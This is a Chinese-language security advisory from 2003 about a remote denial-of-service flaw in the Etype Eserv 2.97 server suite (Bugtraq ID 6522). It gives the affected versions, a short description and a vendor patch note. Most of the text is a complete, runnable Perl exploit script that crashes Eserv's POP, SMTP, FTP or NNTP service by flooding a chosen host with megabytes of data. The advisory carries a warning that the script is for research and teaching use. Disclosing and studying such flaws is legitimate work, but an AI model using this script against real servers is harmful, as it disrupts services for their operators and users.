发布日期：2003-01-04
更新日期：2003-01-09

受影响系统：

Etype Eserv 2.96
Etype Eserv 2.95
Etype Eserv 2.94
Etype Eserv 2.93
Etype Eserv 2.92
Etype Eserv 2.97
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional

描述：

---

BUGTRAQ  ID: 6522

Eserv是一款集成Mail、News、Web、FTP和代理服务器的系统。

Eserv的NNTP服务程序对超大数据处理不正确，远程攻击者可以利用这个漏洞对NNTP服务进行拒绝服务攻击。

攻击者连接Eserv NNTP服务器，发送超过5001216b字节大小数据，可使NNTP服务崩溃.这不是由于缓冲区溢出引起，因此不能用于提升权限和执行任意代码。

<*来源：D4rkGr3y （grey_1999@mail.ru）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104171844131985&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

D4rkGr3y （grey_1999@mail.ru）提供了如下测试方法：

#!/usr/bin/perl
######################################################
#EServ/2.97 remote DoS xsploit
#Bugs founded in v.2.97 but I think that 2.98 is
#vulnerable too.
#################
#Usage: perl EServ.DoS.pl [host] [port] [service_type]
#Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
#Example: perl EServ.DoS.pl localhost 110 pop
#################
#If something wrong or u wanna to discuss something,
#contact me: "D4rkGr3y" <grey_1999@mail.ru> icq: 540981
#######################################################
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$param = $ARGV[2];
$data = "a";
print "\n\n";;
print "#Product: EServ/2.97 - www.eserv.ru\n";
print "#Vuln: remote DoS\n";
print "#Xsploit by D4rkGr3y\n";
print "#Warning: if u use dial-up connection, attack can take a few time.\n\n";
if ($param) {
$num = "4950001" if $param eq "pop";
$num = "4960000" if $param eq "smtp";
$num = "5005312" if $param eq "ftp";
$num = "5001215" if $param eq "nntp";
die "Error in params\n" if !$num;
print "Connecting...";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type =>
SOCK_STREAM) or die "Socket
error.\n";
print "OK\n";
$buf .= $data x $num;
print "Attacking...";
print $socket "$buf\n";
print "OK\n\n";
print "Vizit us at www.dhgroup.org";
close($socket);
} else {
  print "Error in Params.\n";
  print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
  print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
  print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
  exit;
}

#EOF

建议：

---

厂商补丁：

Etype
-----
根据报告最新版本EServ 2.99已经修正了这个漏洞，不过没有得到供应商证实：

http://www.eserv.ru/eserv/

浏览次数：2807
严重程度：0（网友投票）